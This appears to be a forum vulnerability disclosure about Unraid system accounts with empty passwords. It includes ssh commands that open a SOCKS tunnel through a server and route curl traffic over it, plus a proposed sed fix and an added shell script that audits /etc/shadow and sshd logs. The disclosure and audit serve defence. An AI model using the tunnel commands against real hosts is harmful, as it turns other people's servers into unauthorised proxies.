No passwords for system users - unraid can be used as a rogue ssh tunnel



Hello guys,


I couldn't find any proper channels for announcing vulnerabilities, so I think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.


Upon looking at some logs I noticed:

```
sshd[28121]: Accepted none for lp from port 26028 ssh2
```


Then, after I took a close look at /etc/shadow, I noticed almost all users don't have passwords.

While they can't actually execute commands on the system, they can see information about the system:


```
$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.
```




But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell.



```
$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0*               LISTEN      1658854/ssh   
```


Voila! Then you have an ssh tunnel opened.

For now I patched my box, but of course it won't survive the reboot.


An easy fix would be:

`sed -i -e 's/::1/:!!:1/g' /etc/shadow`






Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind :P )


```
[root@taicasimaica ~]# curl -ks4
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N -p 7127
The authenticity of host '[]:7127 ([]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://
[root@taicasimaica ~]# curl -ks4
[root@taicasimaica ~]#
```


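A defender-side audit for the two symptoms described in the first post (empty password fields in /etc/shadow and `Accepted none` entries in the sshd log), added here as an example and not part of the original thread. The function names, the sample shadow entries and the sample log lines (host name `tower`, 192.0.2.x addresses) are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. All sample data is constructed.

# Accounts whose shadow password field (2nd field) is empty, meaning no
# password is required. "*", "!" or "!!" in that field means locked.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$@"
}

# Print "user source count" for each login sshd accepted with method
# "none". Source is "-" when the address is missing, as in the redacted
# log line quoted in the first post.
accepted_none_logins() {
    awk '/sshd\[[0-9]+\]: Accepted none for / {
        for (i = 1; i < NF; i++) if ($i == "for") break
        src = ($(i + 3) == "port") ? "-" : $(i + 3)
        seen[$(i + 1) " " src]++
    }
    END { for (k in seen) print k, seen[k] }' "$@" | LC_ALL=C sort
}

sample_shadow() { cat <<'EOF'
root:$6$constructedsalt$constructedhash:18300:0:99999:7:::
bin:*:18300:0:99999:7:::
lp::18300:0:99999:7:::
news::18300:0:99999:7:::
nobody:!!:18300:0:99999:7:::
EOF
}

sample_log() { cat <<'EOF'
Mar  1 10:00:01 tower sshd[28121]: Accepted none for lp from 192.0.2.10 port 26028 ssh2
Mar  1 10:00:09 tower sshd[28130]: Accepted password for root from 192.0.2.20 port 40112 ssh2
Mar  1 10:02:44 tower sshd[28177]: Accepted none for news from 192.0.2.10 port 26090 ssh2
Mar  1 10:03:02 tower sshd[28190]: Accepted none for lp from 192.0.2.10 port 26101 ssh2
sshd[28121]: Accepted none for lp from port 26028 ssh2
EOF
}

echo "== accounts with an empty password field =="
sample_shadow | empty_password_accounts
echo "== logins accepted with method none =="
sample_log | accepted_none_logins
echo "== still empty after the sed fix from the first post =="
sample_shadow | sed -e 's/::1/:!!:1/g' | empty_password_accounts | wc -l
```

Both functions also accept file names as arguments, so on a real system `empty_password_accounts /etc/shadow` (run as root) audits the live file.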